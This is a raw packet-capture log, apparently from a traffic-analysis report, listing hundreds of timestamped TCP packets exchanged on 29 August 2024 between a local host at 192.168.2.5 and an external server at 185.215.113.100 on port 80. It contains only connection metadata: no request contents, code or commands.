Aug 29, 2024 15:42:50.828699112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828715086 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828715086 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828716040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828733921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828748941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828748941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828774929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828774929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828778982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828794956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828810930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828816891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828816891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828835011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828849077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828849077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828851938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828867912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828874111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828885078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828902006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828907013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828907013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828917980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828929901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828929901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828941107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828960896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828960896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828978062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828983068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828994989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829003096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829020023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829021931 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829036951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829047918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829087019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829087019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829123974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829139948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829158068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829197884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829197884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829197884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829271078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829317093 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829322100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829336882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829355001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829376936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829377890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829395056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829401016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829412937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829428911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829438925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829444885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829461098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829473972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829473972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829473972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829477072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829493046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829494953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829513073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829529047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829541922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829541922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829545021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829556942 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829569101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829593897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829636097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829652071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829667091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829683065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829689980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829689980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829698086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829711914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829715014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829731941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829741955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829746962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.829776049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.829804897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830096960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830113888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830128908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830144882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830154896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830154896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830161095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830167055 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830180883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830197096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830209970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830209970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830209970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830214024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830231905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830239058 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830250978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830252886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830267906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830284119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830291033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830291033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830301046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830303907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830321074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830327034 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830338001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830351114 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830367088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830377102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830377102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830384970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830423117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830423117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830487967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830503941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830518961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830534935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830543995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830543995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830550909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830568075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830579042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830579042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830584049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830601931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830611944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830611944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830617905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830635071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830635071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830647945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830651999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830661058 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830667973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830684900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.830688000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830688000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830708027 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.830739975 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832092047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832107067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832120895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832137108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832154036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832161903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832178116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832180023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832195044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832211018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832222939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832222939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832227945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832262039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832274914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832609892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832628012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832642078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832659006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832664967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832664967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832674026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832690954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832691908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832703114 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832709074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832724094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832734108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832734108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832741022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832757950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832765102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832765102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832775116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832789898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832791090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832789898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832803011 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832808971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832827091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832849979 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832849979 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832869053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832873106 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832885981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832901955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832917929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832917929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832927942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.832945108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.832968950 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.834378004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.834419966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.834446907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.834486008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.834851027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.834903002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.834907055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.834923983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.834959984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.834959984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835601091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835647106 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835652113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835669041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835705996 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835705996 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835755110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835771084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835787058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835813046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835813046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835836887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835911989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835928917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835944891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835961103 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.835962057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835978985 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835995913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.835995913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836039066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836091995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836128950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836144924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836159945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836177111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836184978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836213112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836282015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836313963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836328983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836350918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836350918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836373091 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.836405993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.836452961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837618113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837661028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837671041 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837678909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837709904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837709904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837752104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837769032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837784052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837795973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837800980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837807894 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837821960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837855101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837882996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837898970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837919950 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837945938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.837980032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.837996960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838011980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838027954 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838046074 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838071108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838126898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838141918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838166952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838166952 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838182926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838184118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838205099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838221073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838223934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838223934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838238001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838242054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838254929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838268995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838268995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838270903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838287115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838299036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838304996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838318110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838318110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838335991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838541985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838557005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838573933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838588953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838598967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838606119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838614941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838614941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838644981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838644981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838701010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838717937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838732958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838747025 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838749886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838767052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838768959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838768959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838784933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838793039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838805914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838826895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838848114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838876963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838891983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838891983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838908911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838923931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838926077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838926077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838941097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838956118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838957071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838957071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838973999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.838974953 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.838992119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.839000940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.839008093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.839010954 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.839025974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.839040995 CEST	80	49704	185.215.113.100	192.168.2.5
